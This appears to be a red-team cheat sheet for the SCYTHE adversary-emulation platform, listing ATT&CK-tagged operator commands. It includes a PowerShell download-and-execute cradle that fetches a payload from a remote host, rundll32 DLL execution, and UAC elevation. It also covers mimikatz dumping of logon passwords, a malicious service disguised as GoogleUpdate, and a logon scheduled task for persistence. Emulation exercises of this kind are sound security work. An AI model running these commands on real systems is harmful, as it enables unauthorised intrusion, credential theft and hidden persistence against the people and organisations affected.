# SCYTHE ## Setup Campaign Login to your SCYTHE instance via web browser. Default port is 8443. Campaign Manager - New Campaign Select the following options: * Name: unique name for the campaign * Target Operating System: Windows, Linux, or macOS * Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date * Communication Module: * HTTPS is default, * DNS, HTTP, and Stego require relays to be installed on redirector * Google Sheet and Twitter require third party account/API ### Community Threats (Third Party Adversary Emulation Plans) Download Community Threats from SCYTHE Github: Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import ![Migrate Threats](https://684924954-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M1RMhTtc0RlMwyXtAM5%2F-M8vaQr7k8Hk7azdiB9j%2F-M8voVnCLKXoE5wYieHq%2Fimage.png?alt=media\&token=306f381d-8a28-4e1c-a0b7-a2a0244d2ac7) Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat ## Deploy Payload ### User Execution: Malicious File (T1204.002): Download the binary to the target system and execute by double clicking. ### Signed Binary Proxy Execution: Rundll32 (T1218.011): Download DLL file from SCYTHE and execute below from a cmd.exe: ``` rundll32.exe ServiceLogin.dll,PlatformClientMain ``` ### Command and Scripting Interpreter: PowerShell (T1059.001) Open a powershell.exe and run: ``` $myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock; ``` ## Emulate TTPs ``` loader --load run run whoami run cmd /c whoami ``` ### Load Python Runtime ``` loader --load-runtime python3 list modules loader --load "modulename" "modulename" ``` ### Download files Move file to virtual file system ``` loader --load downloader downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll ``` ### Privilege Escalation (TA0004) #### UAC (T1088) ``` loader --load elevate elevate --prompt ``` ### Credential Access (TA0006) #### Credential Dumping (T1003) ``` loader --load mimikatz mimikatz --arglist privilege::debug mimikatz --arglist sekurlsa::logonPasswords ``` ### Persistence (TA0003) #### New Service (T1050) ``` loader --load persist Synatax: persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location" Example: persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe ``` #### Scheduled Task (T1168) ``` schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain" ``` ## Clean up ### Persistence: ``` run sc delete GoogleUpdate run del C:\Windows\Temp\GoogleUpdate.exe ``` ### Kill agent: ``` controller --shutdown ```